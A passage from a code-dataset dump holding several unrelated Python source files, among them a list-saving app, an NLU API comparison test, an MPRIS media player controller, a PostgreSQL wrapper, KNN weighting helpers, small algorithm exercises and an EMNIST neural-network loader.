the list to a file (y/n) \", (\"y\", \"n\"))\n file_name = input(\"Enter the name of the file, example, list.txt: \")\n if(choice is \"n\"):\n exit()\n save_to_file(file_name, text_list)\n\ndef wordprocessor_app():\n intro()\n text_list = input_text()\n print_list_to_screen(text_list)\n save_question(text_list)\n question = question_choice(\"Would you like to make another list? (y/n): \", (\"y\", \"n\"))\n if(question is \"y\"):\n return wordprocessor_app()\n else:\n exit()\n\ndef main():\n wordprocessor_app()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"python/save_list/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"154786937","text":"# -*- coding: UTF-8 -*-\n\n'''\nCreated on 2020/11/13 16:01\n@File : get_kicp_test.py\n@author: ZL\n@Desc :\n'''\n\nimport requests\nimport uuid\nimport pandas\nimport os\nfrom commonfunc.change_data_type import ChangeDataType\nfrom tqdm import tqdm\nimport datetime\n\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\n\n\nclass GetItemCompare:\n\n def get_test(self):\n url1 = \"http://192.168.1.16:10000/x/identify/v1/re_unify/identify\"\n url2 = \"http://192.168.26.105:32233/kicp_server\"\n re_item1_list, re_item1_en_list, re_item2_list, re_intent1_list, re_intent1_en_list, re_intent2_list, re_ner1_list, re_ner2_list = [], [], [], [], [], [], [], []\n item_tf, intent_tf, ner_tf = [], [], []\n sentence_test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\test.csv\")\n intent_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\intent_tab.xlsx\",\n sheet_name=\"English_tab\")\n topic_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\topic_ch_en.xlsx\",\n sheet_name=\"Sheet1\")\n en_intent = intent_test_data.k.tolist()\n cn_intent = intent_test_data.v.tolist()\n intent_dict = dict(zip(en_intent, cn_intent))\n en_topic = topic_test_data.topic.tolist()\n cn_topic = topic_test_data.english.tolist()\n topic_dict = dict(zip(en_topic, cn_topic))\n headers1 = {\n \"Authorization\": \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJjb21wYW55X2lkIjoxNTIsInJvYm90X2lkIjo4NDQsImV4cCI6MTYwNjExODE3NH0.flFiMl6TtwQJZ8vzqzCvKlkNNhwKE2n_71ixCLEsvlk\",\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n headers2 = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n test_sentence_list = []\n sentence_list = sentence_test_data.sentence.tolist()\n for sentence in tqdm(sentence_list):\n # 构造请求函数,需要两个params里的client_id不一致,否则会出现错误情况,��于同一个id的结果非常慢,所以先校验不同的情况\n params1 = {\n \"dialog\": sentence,\n \"client_id\": str(uuid.uuid1())\n }\n params2 = {\n \"sentence\": sentence,\n \"session_id\": str(uuid.uuid1()),\n \"industry\": \"yiliao\",\n \"domain\": '[\"dentistry\"]'\n }\n result1 = requests.post(url=url1, data=params1, headers=headers1).json()\n result2 = requests.post(url=url2, data=params2, headers=headers2).json()\n try:\n\n # 1.获取item值\n if \"item\" in result1[\"data\"][\"ner\"].keys():\n re_item1 = result1[\"data\"][\"ner\"][\"item\"][\"Value\"][0][\"Value\"]\n else:\n re_item1 = \"Empty\"\n re_item2 = result2[\"data\"][0][\"topic\"][0][\"key\"]\n\n # 2.获取intent值\n re_intent1 = result1[\"data\"][\"ner\"][\"intent\"][\"Value\"][0][\"Value\"]\n re_intent2 = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"key\"]\n\n # 3.获取ner,去除item,intent,action和bio,校验剩余字段\n confirm_list = []\n del result1[\"data\"][\"ner\"][\"action\"]\n\n if \"bio\" in result1[\"data\"][\"ner\"]:\n del result1[\"data\"][\"ner\"][\"bio\"]\n\n for i in result1[\"data\"][\"ner\"].keys():\n if \"intent\" not in i and \"item\" not in i:\n confirm_list.append(i)\n re_ner1 = []\n for j in confirm_list:\n confirm_value1 = []\n for k in result1[\"data\"][\"ner\"][j][\"Value\"]:\n confirm_value1.append(k[\"Value\"])\n re_ner1.append({'key': j, \"value\": confirm_value1})\n re_ner2 = result2[\"data\"][0][\"entity\"]\n except Exception as e:\n print(result1)\n print(result2)\n test_sentence_list.append(sentence)\n re_item1_list.append(\"error\")\n re_item1_en_list.append(\"error\")\n re_item2_list.append(\"error\")\n item_tf.append(\"error\")\n re_intent1_list.append(\"error\")\n re_intent1_en_list.append(\"error\")\n re_intent2_list.append(\"error\")\n intent_tf.append(\"error\")\n re_ner1_list.append(\"error\")\n re_ner2_list.append(\"error\")\n ner_tf.append(\"error\")\n print(e)\n print(sentence)\n\n re_ner1_list.append(re_ner1)\n re_ner2_list.append(re_ner2)\n ner_tf.append(re_ner1 == re_ner2)\n test_sentence_list.append(sentence)\n re_intent1_list.append(re_intent1)\n re_intent1_en_list.append(intent_dict[re_intent1])\n re_intent2_list.append(re_intent2)\n intent_tf.append(intent_dict[re_intent1] == re_intent2)\n re_item1_list.append(re_item1)\n re_item1_en_list.append(topic_dict[re_item1] if re_item1 != \"Empty\" else \"Empty\")\n re_item2_list.append(re_item2)\n item_tf.append(re_item2 == (topic_dict[re_item1] if re_item1 != \"Empty\" else \"Empty\"))\n\n result_data = pandas.DataFrame(\n {\"sentence\": test_sentence_list, \"re_item1_list\": re_item1_list, \"re_item1_en_list\": re_item1_en_list,\n \"re_item2_list\": re_item2_list, \"item_tf\": item_tf,\n \"re_intent1_list\": re_intent1_list, \"re_intent1_en_list\": re_intent1_en_list,\n \"re_intent2_list\": re_intent2_list, \"intent_tf\": intent_tf,\n \"re_ner1_list\": re_ner1_list, \"re_ner2_list\": re_ner2_list, \"ner_tf\": ner_tf})\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\item\\\\\" + now + \"item_result.csv\")\n\n def get_lot_test(self):\n url2 = \"http://192.168.26.105:30237/kicp_server\"\n sentence_test_data = ChangeDataType.file_to_dict(rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\test.csv\")\n intent_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\intent_tab.xlsx\",\n sheet_name=\"English_tab\")\n topic_test_data = ChangeDataType.file_to_dict(\n rootPath + \"\\\\testdata\\\\apidata\\\\item\\\\dentistry\\\\topic_ch_en.xlsx\",\n sheet_name=\"Sheet1\")\n re_ner2_list, re_item_en_list, re_intent2_list, re_intent_en_list, re_item2_list, topic_tf, intent_tf = [], [], [], [], [], [], []\n en_intent = intent_test_data.k.tolist()\n cn_intent = intent_test_data.v.tolist()\n intent_dict = dict(zip(en_intent, cn_intent))\n en_topic = topic_test_data.topic.tolist()\n cn_topic = topic_test_data.english.tolist()\n topic_dict = dict(zip(en_topic, cn_topic))\n headers2 = {\n \"Content-Type\": \"application/x-www-form-urlencoded\"\n }\n test_sentence_list = []\n sentence_list = sentence_test_data.sentence.tolist()\n for sentence in tqdm(sentence_list):\n params2 = {\n \"sentence\": sentence,\n \"session_id\": str(uuid.uuid1()),\n \"industry\": \"yiliao\",\n \"domain\": '[\"dentistry\"]'\n }\n result2 = requests.post(url=url2, data=params2, headers=headers2).json()\n try:\n re_item_en = result2[\"data\"][0][\"topic\"][0][\"key\"]\n re_item2 = result2[\"data\"][0][\"topic\"][0][\"name\"]\n re_intent_en = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"key\"]\n re_intent2 = result2[\"data\"][0][\"topic\"][0][\"intent\"][0][\"name\"]\n re_ner2 = result2[\"data\"][0][\"entity\"]\n ttf = (re_item_en == topic_dict[re_item2])\n itf = (re_intent_en == intent_dict[re_intent2])\n except Exception as e:\n print(e)\n print(sentence)\n re_ner2_list.append(re_ner2)\n re_item_en_list.append(re_item_en)\n re_intent_en_list.append(re_intent_en)\n test_sentence_list.append(sentence)\n re_intent2_list.append(re_intent2)\n re_item2_list.append(re_item2)\n topic_tf.append(ttf)\n intent_tf.append(itf)\n result_data = pandas.DataFrame(\n {\"sentence\": test_sentence_list, \"re_ite_en_list\": re_item_en_list, \"re_item2_list\": re_item2_list, \"topic_tf\": topic_tf,\n \"re_intent_en_list\": re_intent_en_list, \"re_intent2_list\": re_intent2_list, \"intent_tf\": intent_tf, \"re_ner2_list\": re_ner2_list})\n now = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n result_data.to_csv(rootPath + \"\\\\testresults\\\\resultfile\\\\item\\\\\" + now + \"item_result.csv\")\n\n\nif __name__ == '__main__':\n GetItemCompare().get_lot_test()\n","sub_path":"api/get_kcip_test.py","file_name":"get_kcip_test.py","file_ext":"py","file_size_in_byte":9039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"558307255","text":"import dbus\nimport time\nimport logging\n\nfrom metadata import Metadata\n\nPLAYING = \"playing\"\n\nmpris = None\n\nMPRIS_NEXT = \"Next\"\nMPRIS_PREV = \"Previous\"\nMPRIS_PAUSE = \"Pause\"\nMPRIS_PLAYPAUSE = \"PlayPause\"\nMPRIS_STOP = \"Stop\"\nMPRIS_PLAY = \"Play\"\n\nmpris_commands = [MPRIS_NEXT, MPRIS_PREV,\n MPRIS_PAUSE, MPRIS_PLAYPAUSE,\n MPRIS_STOP, MPRIS_PLAY]\n\n\ndef array_to_string(arr):\n \"\"\"\n Converts an array of objects to a comma separated string\n \"\"\"\n res = \"\"\n for part in arr:\n res = res + part + \", \"\n if len(res) > 1:\n return res[:-2]\n else:\n return \"\"\n\n\nclass PlayerState:\n \"\"\"\n Internal representation of the state of a player\n \"\"\"\n\n def __init__(self, state=\"unknown\", metadata=None):\n self.state = state\n if metadata is not None:\n self.metadata = metadata\n else:\n self.metadata = Metadata()\n\n def __str__(self):\n return self.state + str(self.metadata)\n\n\nclass MPRISController:\n \"\"\"\n Controller for MPRIS enabled media players\n \"\"\"\n\n def __init__(self, auto_pause=True):\n self.state_table = {}\n self.bus = dbus.SystemBus()\n self.auto_pause = auto_pause\n self.metadata_displays = []\n\n def register_metadata_display(self, mddisplay):\n self.metadata_displays.append(mddisplay)\n\n def metadata_notify(self, metadata):\n for md in self.metadata_displays:\n md.metadata(metadata)\n\n def retrievePlayers(self):\n \"\"\"\n Returns a list of all MPRIS enabled players that are active in \n the system\n \"\"\"\n return [name for name in self.bus.list_names()\n if name.startswith(\"org.mpris\")]\n\n def retrieveState(self, name):\n \"\"\"\n Returns the playback state for the given player instance\n \"\"\"\n try:\n proxy = self.bus.get_object(name, \"/org/mpris/MediaPlayer2\")\n device_prop = dbus.Interface(\n proxy, \"org.freedesktop.DBus.Properties\")\n state = device_prop.Get(\"org.mpris.MediaPlayer2.Player\",\n \"PlaybackStatus\")\n return state\n except:\n return None\n\n def retrieveMeta(self, name):\n \"\"\"\n Return the metadata for the given player instance\n \"\"\"\n try:\n proxy = self.bus.get_object(name, \"/org/mpris/MediaPlayer2\")\n device_prop = dbus.Interface(\n proxy, \"org.freedesktop.DBus.Properties\")\n prop = device_prop.Get(\n \"org.mpris.MediaPlayer2.Player\", \"Metadata\")\n try:\n artist = array_to_string(prop.get(\"xesam:artist\"))\n except:\n artist = None\n\n try:\n title = str(prop.get(\"xesam:title\"))\n except:\n title = None\n\n try:\n albumArtist = array_to_string(prop.get(\"xesam:albumArtist\"))\n except:\n albumArtist = None\n\n try:\n albumTitle = str(prop.get(\"xesam:album\"))\n except:\n albumTitle = None\n\n try:\n artURL = str(prop.get(\"mpris:artUrl\"))\n except:\n artURL = None\n\n try:\n discNumber = str(prop.get(\"xesam:discNumber\"))\n except:\n discNumber = None\n\n try:\n trackNumber = str(prop.get(\"xesam:trackNumber\"))\n except:\n trackNumber = None\n\n md = Metadata(artist, title, albumArtist, albumTitle,\n artURL, discNumber, trackNumber)\n\n md.playerName = self.playername(name)\n\n md.fixProblems()\n\n return md\n\n except dbus.exceptions.DBusException as e:\n logging.debug(e)\n\n def mpris_command(self, playername, command):\n if command in mpris_commands:\n proxy = self.bus.get_object(playername,\n \"/org/mpris/MediaPlayer2\")\n player = dbus.Interface(\n proxy, dbus_interface='org.mpris.MediaPlayer2.Player')\n\n run_command = getattr(player, command,\n lambda: \"Unknown command\")\n return run_command()\n else:\n raise RuntimeError(\"MPRIS command {} not supported\".format(\n command))\n\n def pause_inactive(self, active_player):\n \"\"\"\n Automatically pause other player if playback was started \n on a new player\n \"\"\"\n for p in self.state_table:\n if (p != active_player) and \\\n (self.state_table[p].state == PLAYING):\n logging.info(\"Pausing \" + self.playername(p))\n self.mpris_command(p, MPRIS_PAUSE)\n\n def pause_all(self):\n for player in self.state_table:\n self.mpris_command(player, MPRIS_PAUSE)\n\n def print_players(self):\n for p in self.state_table:\n print(self.playername(p))\n\n def playername(self, mprisname):\n if (mprisname.startswith(\"org.mpris.MediaPlayer2.\")):\n return mprisname[23:]\n else:\n return mprisname\n\n def main_loop(self):\n \"\"\" \n Main loop: \n - monitors state of all players\n - pauses players if a new player starts palyback\n \"\"\"\n\n finished = False\n md = Metadata()\n active_players = set()\n while not(finished):\n new_player_started = None\n\n for p in self.retrievePlayers():\n\n if p not in self.state_table:\n self.state_table[p] = PlayerState()\n\n try:\n state = self.retrieveState(p).lower()\n except:\n logging.info(\"Got no state from \" + p)\n state = \"unknown\"\n self.state_table[p].state = state\n\n # Check if playback started on a player that wasn't\n # playing before\n if state == PLAYING:\n if (p not in active_players):\n new_player_started = p\n active_players.add(p)\n\n md_old = self.state_table[p].metadata\n md = self.retrieveMeta(p)\n\n self.state_table[p].metadata = md\n if md is not None:\n if not(md.sameSong(md_old)):\n self.metadata_notify(md)\n else:\n if p in active_players:\n active_players.remove(p)\n\n if new_player_started is not None:\n if self.auto_pause:\n logging.info(\n \"new player started, pausing other active players\")\n self.pause_inactive(new_player_started)\n else:\n logging.debug(\"auto-pause disabled\")\n\n time.sleep(0.2)\n\n def __str__(self):\n \"\"\"\n String representation of the current state: all players,\n playback state and meta data\n \"\"\"\n res = \"\"\n for p in self.state_table:\n res = res + \"{:30s} - {:10s}: {}/{}\\n\".format(\n self.playername(p),\n self.state_table[p].state,\n self.state_table[p].metadata.artist,\n self.state_table[p].metadata.title)\n\n return res\n","sub_path":"buildroot/package/audiocontrol2/src/mpris.py","file_name":"mpris.py","file_ext":"py","file_size_in_byte":7494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"654449794","text":"import psycopg2\r\nimport config\r\n\r\nclass PostgreSQL:\r\n def __init__(self, database):\r\n self.conn = psycopg2.connect(config.postgre_conn_string)\r\n self.cursor = self.conn.cursor()\r\n\r\n def select_all(self,table):\r\n self.cursor.execute('SELECT * FROM '+table)\r\n res = self.cursor.fetchall()\r\n return res\r\n\r\n def select_single(self, table, rownum):\r\n self.cursor.execute(\"\"\"SELECT * FROM \"\"\"+table + \"\"\" WHERE id='%s'\"\"\", (rownum,))\r\n item = self.cursor.fetchall()\r\n if item:\r\n return item[0]\r\n return None\r\n\r\n def count_rows(self, table):\r\n self.cursor.execute('SELECT * FROM ' + table)\r\n result = self.cursor.fetchall()\r\n return len(result)\r\n\r\n def add(self, table, item):\r\n self.cursor = self.conn.cursor()\r\n length = len(item)\r\n str = ''\r\n for i in range(length):\r\n str = str + \"%s, \"\r\n str = str[:-2]\r\n self.cursor.execute(\"INSERT INTO \" + table + \"(id, file_id, right_answer, wrong_answer) VALUES(\" + str + \")\", (item))\r\n self.cursor.close()\r\n self.conn.commit()\r\n\r\n def delete_single(self, table, rownum):\r\n self.cursor.execute(\"\"\"DELETE FROM \"\"\" + table + \"\"\" WHERE id='%s'\"\"\", (rownum,))\r\n self.cursor.close()\r\n self.conn.commit()\r\n\r\n def delete_all(self, table):\r\n self.cursor.execute(\"\"\"DELETE FROM \"\"\" + table + \"\"\";\"\"\")\r\n self.cursor.close()\r\n self.conn.commit()\r\n","sub_path":"PostgreSQL.py","file_name":"PostgreSQL.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"447390253","text":"# -*- coding:utf8 -*-\n# @TIME : 2019/3/17 10:17\n# @Author : SuHao\n# @File : set_weight.py\n\nimport math\nimport numpy as np\nfrom sklearn import preprocessing\n\n\ndef gaussian(dist, a=1, b=0, c=0.8):\n dist = (dist - np.mean(dist))/np.std(dist) #高斯方法采用正态归一化\n return a * math.e ** (-(dist - b) ** 2 / (2 * c ** 2))\n\n\ndef reverse(dist, const=1):\n min_max_scaler = preprocessing.MinMaxScaler()\n dist = min_max_scaler.fit_transform(dist) #采用库函数自带的最大最小归一化\n return 1 / (dist + const)\n\n\ndef reverse_weight(neighbor, label_num):\n # 此处neighbor存放着近邻点的距离和对应的标签\n label = neighbor[:, 1].astype(np.int8)\n prob = np.zeros((label_num, ))\n reverse_dist = reverse(neighbor[:, 0])\n for i in range(label_num):\n prob[i] = np.sum((label == i) * reverse_dist)\n prob = prob / np.sum(reverse_dist)\n result = np.argmax(prob)\n return prob, result\n\n\ndef uniform_weight(neighbor, label_num):\n label = neighbor[:, 1].astype(np.int8)\n prob = np.bincount(\n label, minlength=label_num) / neighbor.shape[0]\n result = np.argmax(prob)\n return prob, result\n\n\ndef gaussian_weight(neighbor, label_num):\n '''\n :param neighbor: 两列,第一列存放距离,第二列存放标签\n :param label_num: 总的标签数量\n :return: 预测结果和预测置信度\n '''\n label = neighbor[:, 1].astype(np.int8)\n prob = np.zeros((label_num, ))\n gaussian_dist = gaussian(neighbor[:, 0])\n for i in range(label_num):\n prob[i] = np.sum((label == i) * gaussian_dist)\n prob = prob / np.sum(gaussian_dist)\n result = np.argmax(prob)\n return prob, result\n","sub_path":"myKnn/set_weight.py","file_name":"set_weight.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"652505263","text":"def is_number_balanced(n):\n\tif n // 10 == 0:\n\t\treturn True\n\n\ttemp = n\n\tlength = 0\n\twhile temp > 0:\n\t\tlength += 1\n\t\ttemp //= 10\n\n\trightPart = 0\n\thalflen = length // 2\n\twhile halflen > 0:\n\t\trightPart += n % 10\n\t\tn //= 10\n\t\thalflen -= 1\n\n\tif length % 2 != 0:\n\t\tn //= 10\n\n\tleftPart = 0\n\twhile n > 0:\n\t\tleftPart += n % 10\n\t\tn //= 10\n\n\tif leftPart == rightPart:\n\t\treturn True\n\treturn False\n\nprint(is_number_balanced(1238033))","sub_path":"Week0/Problems1/list_to_number.py","file_name":"list_to_number.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"83467039","text":"################################################################\n# Author : yiorgosynkl (find me in Github: https://github.com/yiorgosynkl)\n# Date created : 20210314\n# Problem link : https://leetcode.com/problems/swapping-nodes-in-a-linked-list/\n################################################################\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution:\n def swapNodes(self, head: ListNode, k: int) -> ListNode:\n ptr, l = head, 0\n while ptr:\n l += 1\n ptr = ptr.next\n dummy = ListNode(0, head)\n ptr1, ptr2 = dummy, dummy\n for _ in range(k-1):\n ptr1 = ptr1.next\n for _ in range(l-k):\n ptr2 = ptr2.next\n ptr1, ptr1.next, ptr2, ptr2.next = ptr2.next, ptr2.next.next, ptr1.next, ptr1.next.next\n ptr1.val, ptr2.val = ptr2.val, ptr1.val\n return head\n\n # # pointers k apart\n # def swapNodes(self, head: ListNode, k: int) -> ListNode:\n # lo, hi = head, head\n # for _ in range(k-1):\n # hi = hi.next\n # swap1 = hi\n # while hi.next:\n # lo = lo.next\n # hi = hi.next\n # swap2 = lo\n # swap1.val, swap2.val = swap2.val, swap1.val\n # return head\n","sub_path":"30_day_challenge_2021_March/1721_swapping_nodes_in_a_linked_list.py","file_name":"1721_swapping_nodes_in_a_linked_list.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"28384699","text":"#!/usr/bin/python3\n\n# Input: \n# 5\n# 5 6 2 7 4\n# Output:\n# 6 * 7 = 42\n\n# To test with dataset \"python3 filename.py < dataset.txt\"\n\n\"\"\" Find the largest pair of integers and calculate if their product is the largest. \"\"\"\n\nn = int(input())\na = [int(x) for x in input().split()]\n\nindex_1 = 0\nfor i in range(1, n):\n if a[i] > a[index_1]:\n index_1 = i\n\nif index_1 == 0:\n index_2 = 1\nelse:\n index_2 = 0\n\nfor i in range(0, n):\n if a[i] != a[index_1] and a[i] > a[index_2]:\n index_2 = i\n\nprint(a[index_1] * a[index_2])","sub_path":"edx/algs200x/week1/MaxPairwiseProductFast.py","file_name":"MaxPairwiseProductFast.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"274449285","text":"#Garden Bed\n#A program that calculates the # of board feet and # of full 12' boards\n# needed to build a raised garden bed. It also calculates the cubic yds\n# of soil needed to fill it.\n\nimport graphics as g\n\ndef gardenBed():\n \n win = g.GraphWin('Garden Bed Calculator', 800, 800)\n \n dimText = g.Text (g.Point(400, 25), \"Enter the dimensions in feet for your bed type\")\n dimText.draw ( win )\n \n bedSquare = g.Rectangle( g.Point( 50, 100 ), g.Point ( 225, 275 ))\n bedRectangle = g.Rectangle( g.Point( 350, 100 ), g.Point ( 475, 350 ))\n# bedHexagon =\n# bedIrregular =\n \n bedSquare.draw ( win )\n bedRectangle.draw ( win )\n \n dimSquare = g.Entry( g.Point( 137, 80 ), 2 )\n dimSquare.draw (win)\n \n dimRectShort = g.Entry( g.Point( 412, 80 ), 2 )\n dimRectShort.draw (win)\n \n dimRectLong = g.Entry( g.Point( 325, 225 ), 2 )\n dimRectLong.draw (win)\n \n#Determine height of garden bed\n# bedHeight = input(\"What will be the height of your garden bed? \")\n \n#Calculate perimeters\n# if bedType = 1:\n# perimeter = float(input(\"What is the length of one side of your bed? \")) * 4\n# if bedType = 2:\n# perimeter = float(input(\"What is the lenght of one short end of your box? \")) * 2 + float(input(\"What is the length of one long end of your box? \")) * 2\n\n#Calculate volume\n\n#Calculate total board feet\n\n#Calculate total 12' boards needed\n\n\ngardenBed()\n ","sub_path":"garden_bed.py","file_name":"garden_bed.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"52074815","text":"__author__ = \"Pierre Galaup - Nicolas Garcia\"\n\nfrom time import time\n\nfrom Product import Product\nfrom Exceptions import ACLError\nfrom CategoriesManager import CategoriesManager\n\n\nclass ProductsManager:\n total = 0\n\n def __init__(self):\n self.products = []\n self.total += 1\n self.categories_mng = CategoriesManager()\n\n def __del__(self):\n self.total -= 1\n\n def get_products(self):\n return self.products\n\n def add_product(self, name, categories, description, image, start_price, vendor_id, start_date, end_date,\n shipping_cost,\n is_direct):\n if len(name) < 2 or len(description) < 10:\n raise AssertionError('Too short string')\n if len(name) < 2 or start_price < 0 or shipping_cost < 0 or vendor_id < 0:\n raise AssertionError('Int not correct')\n if int(end_date) <= int(start_date) and is_direct == 0:\n raise AssertionError('Dates are not correct')\n if not isinstance(categories, list) or len(categories) < 1:\n raise AssertionError('Categories are not a list or is empty')\n if not is_direct == 1 and not is_direct == 0:\n raise AssertionError('is_direct must be 0 or 1 only')\n if end_date < start_date + 300 and is_direct == 0: # 5 minutes est le temps minimal pour une enchere\n raise AssertionError('Wrong period or too short')\n for category in categories:\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category.__str__() + '] does not exists')\n product = Product(name, categories, description, image, start_price, start_date, end_date, shipping_cost,\n vendor_id, is_direct)\n self.products.append(product)\n return product\n\n def import_product(self, product, to_append=True):\n new_product = Product(product['name'], product['categories'], product['description'], product['image'],\n product['start_price'],\n product['start_date'], product['end_date'], product['shipping_cost'],\n product['vendor_id'], product['is_direct'], product['bidders'], product['bid_count'],\n product['current_price'],\n product['id'])\n for category in new_product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category.__str__() + '] does not exists')\n if to_append:\n self.products.append(new_product)\n else:\n return new_product\n\n def get_product_by_id(self, _id):\n \"\"\"\n\n @rtype : Product\n \"\"\"\n for product in self.products:\n if product.get_id() == _id:\n return product\n raise ValueError('Product.id not found')\n\n def get_product_by_name(self, name):\n \"\"\"\n\n @rtype : Product\n \"\"\"\n for product in self.products:\n if product.get_name() == name:\n return product\n raise ValueError('Product.name not found')\n\n def del_product(self, _id):\n for product in self.products:\n if product.get_id() == _id:\n for category in product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.decrease_products_count()\n if cat.get_products_count() == 0:\n self.categories_mng.del_category(category)\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n self.products.remove(product)\n return True\n raise ValueError('Product.id not found')\n\n def upt_product(self, _id, name, description, image, categories, start_price, shipping_cost, end_date, is_direct,\n current_user):\n product = self.get_product_by_id(_id)\n if product.get_vendor_id() != current_user:\n raise ACLError('Not vendor trying to modify bid')\n if len(name) < 2 or len(description) < 10:\n raise AssertionError('Too short string')\n if len(name) < 2 or start_price < 0 or shipping_cost < 0:\n raise AssertionError('Int not correct')\n if (int(end_date) <= int(product.get_start_date())) and is_direct == 0:\n raise AssertionError('Dates are not correct')\n if not isinstance(categories, list) or len(categories) < 1:\n raise AssertionError('Categories are not a list or is empty')\n if (end_date < product.get_start_date() + 300 or end_date <= time()) and is_direct == 0:\n raise AssertionError('Wrong period or too short')\n if len(product.get_bidders()) > 0:\n if start_price != product.get_start_price():\n raise AssertionError('Cannot modify a start price of a bid if there is already bids on it')\n if not is_direct == 0 and not is_direct == 1 and is_direct != product.get_is_direct():\n raise AssertionError('Cannot toggle a bid to an instant-buy if there is already bids on it')\n if product.end_date != end_date:\n raise AssertionError('Cannot change a bid\\'s end date if there is already bids on it.')\n if product.get_shipping_cost() != shipping_cost:\n raise AssertionError('Cannot change bid\\'s shipping cost if there is already bids on it')\n\n for category in categories:\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.increase_products_count()\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n for category in product.get_categories():\n try:\n cat = self.categories_mng.get_category_by_id(category)\n cat.decrease_products_count()\n if cat.get_products_count() == 0:\n self.categories_mng.del_category(category)\n except ValueError:\n raise AssertionError('Category with id [' + category + '] does not exists')\n product.name = name\n product.description = description\n product.categories = categories\n product.start_price = start_price\n product.shipping_cost = shipping_cost\n product.end_date = end_date\n product.is_direct = is_direct\n product.image = image\n return product\n\n def jsonify(self):\n json = []\n for product in self.products:\n json.append(product.jsonify())\n return json\n\n def get_products_with_category(self, category_id):\n \"\"\"\n\n @rtype : List\n \"\"\"\n try:\n self.categories_mng.get_category_by_id(category_id)\n except ValueError:\n raise AssertionError('Category given does not exists')\n products = []\n for product in self.products:\n for category in product.get_categories():\n if category == category_id:\n products.append(product.jsonify())\n break\n return products\n","sub_path":"back-end/src/ProductsManager.py","file_name":"ProductsManager.py","file_ext":"py","file_size_in_byte":7567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"256147815","text":"# Tom Jarman, 13/03/21\n\nimport numpy as np\nimport numpy.matlib\nimport math\nimport matplotlib.pyplot as plt\nimport csv\nfrom scipy.io import loadmat\n\n\n###########################\n# #\n# Activation Functions #\n# #\n###########################\ndef relu(h):\n \"\"\" ReLU function, takes input h and return result of ReLU(h) \"\"\"\n return np.maximum(h, 0)\n\n\n\ndef relu_prime(h):\n \"\"\" Derivative of the ReLU function \"\"\"\n return_value = h\n return_value[return_value <= 0] = 0\n return_value[return_value > 0 ] = 1\n return return_value\n\n\n\n###########################\n# #\n# Loading Data #\n# #\n###########################\ndef load_data(filename):\n \"\"\" Loads dataset and performs neccessary spliting, shuffling and formatting \"\"\"\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Seperate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels\n\n\n\n###########################\n# #\n# Init Functions #\n# #\n###########################\ndef init_expected_outputs(data, no_labels=26):\n \"\"\" Takes in output labels and converts to corresponding output layer output\"\"\"\n expected_outputs = np.zeros((data.shape[0], no_labels))\n \n for i in range(0,data.shape[0]): \n expected_outputs[i, data[i].astype(int)]=1\n\n return expected_outputs\n\n\n\ndef init_weights(n_input_layer, n_hidden_layer, n_hidden_layer_2, 